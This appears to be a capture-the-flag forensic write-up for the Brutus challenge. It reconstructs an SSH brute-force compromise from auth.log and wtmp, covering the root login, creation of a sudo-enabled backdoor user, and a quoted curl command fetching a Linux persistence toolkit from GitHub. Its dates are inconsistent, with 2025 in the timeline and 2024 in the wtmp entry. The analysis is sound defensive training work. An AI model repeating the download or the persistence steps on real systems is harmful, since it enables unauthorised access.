Brutus
Date: 27/10/2025
Difficulty: Very Easy
Category: DFIR
Description: In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
1. Executive Summary
This report details the forensic investigation into a device compromise via a Brute Force Attack against its SSH service. The investigation utilised the provided Unix auth.log and wtmp artifacts. Analysis confirmed a successful breach, post-exploitation activities including privilege escalation and persistence via a new user account, and the subsequent download of an external script. The threat actor’s initial access was gained using the root account.
2. Artefacts
| Artefact | Description |
|---|---|
auth.log | Linux authentication logs used to track authentication, sshd actions, sudo actions, and command execution via sudo. |
wtmp | Binary file logging all login/logout, system reboots, and runlevel changes. Used to track interactive terminal sessions. |
utmp.py | Tool used to parse binary wtmp into a human-readable format (wtmp.out). |
3. Events Timeline
| Datetime | ATT&CK ID | Description |
|---|---|---|
| 06/03/25 06:31:31 | T1110 - Brute Force | Numerous "Invalid user" and "Failed password" entries from the attacker's IP address. |
| 06/03/25 06:31:40 | T1110 - Brute Force | Successful authentication for the root account via SSH. auth.log: Accepted password for root from 65.2.161.68. |
| 06/03/25 06:31:40 | T1110 - Brute Force | Immediate session close, typical of a brute-forcing tool. auth.log: Disconnected from user root.... |
| 06/03/25 06:32:44 | T1078 - Valid Accounts | Attacker logs in manually (interactive session established). auth.log: Accepted password for root from 65.2.161.68. |
| 06/03/25 06:32:45 | T1078 - Valid Accounts | Interactive terminal session established (Session ID 37). wtmp: root session start at 2024/03/06 06:32:45. |
| 06/03/25 06:35.13 | T1136.001 - Create Local Account | New user cyberjunkie created. auth.log: useradd... new user=cyberjunkie. |
| 06/03/25 06:35.15 | T1098 - Account Manipulation | New user added to the sudo group for elevated privileges. auth.log: usermod... add cyberjunkie to group "sudo". |
| 06/03/25 06:37.24 | n/a | Attacker's first interactive session (ID 37) is closed. auth.log: session 37 logged out... removed session 37. |
| 06/03/25 06:37.34 | T1078 - Valid Accounts | Attacker logs in as the new persistent user cyberjunkie. |
| 06/03/25 06:39.38 | T1105 - Ingress Tool Transfer | Script downloaded using sudo privileges. auth.log: COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh.This script is described as a "linux persistence toolkit" on its official GitHub page: https://github.com/montysecurity/linper. |